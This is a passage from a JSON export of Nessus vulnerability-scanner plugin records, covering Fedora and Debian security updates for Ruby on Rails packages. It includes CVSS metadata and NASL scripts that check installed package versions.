script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\"CVE-2016-0752\");\n script_xref(name:\"FEDORA\", value:\"2016-fa0dec2360\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", 
value:\"2022/04/15\");\n\n script_name(english:\"Fedora 22 : rubygem-actionview-4.2.0-3.fc22 (2016-fa0dec2360)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Security fix for CVE-2016-0752\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301963\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178044.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01235df4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rubygem-actionview package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails Dynamic Render File Upload Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"rubygem-actionview-4.2.0-3.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionview\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T16:35:07", "description": "Security fix for CVE-2016-0752\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 23 : rubygem-actionview-4.2.3-3.fc23 (2016-97002ad37b)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-97002AD37B.NASL", "href": "https://www.tenable.com/plugins/nessus/89585", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-97002ad37b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89585);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\"CVE-2016-0752\");\n script_xref(name:\"FEDORA\", value:\"2016-97002ad37b\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", 
value:\"2022/04/15\");\n\n script_name(english:\"Fedora 23 : rubygem-actionview-4.2.3-3.fc23 (2016-97002ad37b)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Security fix for CVE-2016-0752\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301963\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178069.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57da4d34\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rubygem-actionview package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails Dynamic Render File Upload Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"rubygem-actionview-4.2.3-3.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionview\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:39:24", "description": "Update to Rails 5.0.0.1.\n\nEnable whole test suite in Railties.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-11-15T00:00:00", "type": "nessus", "title": "Fedora 25 : 1:rubygem-actionmailer / 1:rubygem-actionpack / etc (2016-5760339e76)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:rubygem-actionmailer", "p-cpe:/a:fedoraproject:fedora:1:rubygem-actionpack", "p-cpe:/a:fedoraproject:fedora:1:rubygem-activerecord", "p-cpe:/a:fedoraproject:fedora:1:rubygem-activesupport", "p-cpe:/a:fedoraproject:fedora:1:rubygem-rails", "p-cpe:/a:fedoraproject:fedora:rubygem-actioncable", "p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "p-cpe:/a:fedoraproject:fedora:rubygem-activejob", "p-cpe:/a:fedoraproject:fedora:rubygem-activemodel", 
"p-cpe:/a:fedoraproject:fedora:rubygem-railties", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2016-5760339E76.NASL", "href": "https://www.tenable.com/plugins/nessus/94808", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-5760339e76.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94808);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n\n script_name(english:\"Fedora 25 : 1:rubygem-actionmailer / 1:rubygem-actionpack / etc (2016-5760339e76)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Rails 5.0.0.1.\n\nEnable whole test suite in Railties.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-5760339e76\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-actionmailer\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-activerecord\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-activesupport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actioncable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-activejob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-activemodel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-railties\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-actionmailer-5.0.0.1-1.fc25\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-actionpack-5.0.0.1-2.fc25\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-activerecord-5.0.0.1-1.fc25\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-activesupport-5.0.0.1-1.fc25\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-rails-5.0.0.1-1.fc25\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-actioncable-5.0.0.1-1.fc25\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-actionview-5.0.0.1-2.fc25\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-activejob-5.0.0.1-1.fc25\")) flag++;\nif (rpm_check(release:\"FC25\", 
reference:\"rubygem-activemodel-5.0.0.1-1.fc25\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-railties-5.0.0.1-2.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:rubygem-actionmailer / 1:rubygem-actionpack / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-01T14:21:18", "description": "Security fix for CVE-2015-7576 CVE-2016-0753\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 22 : rubygem-activesupport-4.2.0-4.fc22 (2016-cb30088b06)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2016-0753"], "modified": "2021-01-11T00:00:00", "cpe": 
["p-cpe:/a:fedoraproject:fedora:rubygem-activesupport", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-CB30088B06.NASL", "href": "https://www.tenable.com/plugins/nessus/89614", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-cb30088b06.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89614);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7576\", \"CVE-2016-0753\");\n script_xref(name:\"FEDORA\", value:\"2016-cb30088b06\");\n\n script_name(english:\"Fedora 22 : rubygem-activesupport-4.2.0-4.fc22 (2016-cb30088b06)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-7576 CVE-2016-0753\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301933\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301973\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178047.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7aa733ef\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-activesupport package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-activesupport\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: 
\"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"rubygem-activesupport-4.2.0-4.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-activesupport\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-15T14:12:24", "description": "The support and utility classes used by the Rails 3.2 framework allow remote attackers to cause a denial of service (SystemStackError) via a large XML document depth.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 3.2.6-6+deb7u2.\n\nAdditionally this upload adds 'active_support/security_utils' that will be used by ruby-actionpack-3.2 to address CVE-2015-7576.\n\nWe recommend that you upgrade your ruby-activesupport-3.2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-08-29T00:00:00", "type": "nessus", "title": "Debian DLA-603-1 : ruby-activesupport-3.2 security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3227", "CVE-2015-7576"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ruby-activesupport-3.2", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-603.NASL", "href": "https://www.tenable.com/plugins/nessus/93131", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-603-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93131);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3227\");\n script_bugtraq_id(75234);\n\n script_name(english:\"Debian DLA-603-1 : ruby-activesupport-3.2 security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The support and utility classes used by the Rails 3.2 framework allow\nremote attackers to cause a denial of service (SystemStackError) via a\nlarge XML document depth.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.2.6-6+deb7u2.\n\nAdditionally this upload adds 'active_support/security_utils' that\nwill be used by ruby-actionpack-3.2 to address CVE-2015-7576.\n\nWe recommend that you upgrade your ruby-activesupport-3.2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/08/msg00027.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/ruby-activesupport-3.2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected ruby-activesupport-3.2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activesupport-3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif 
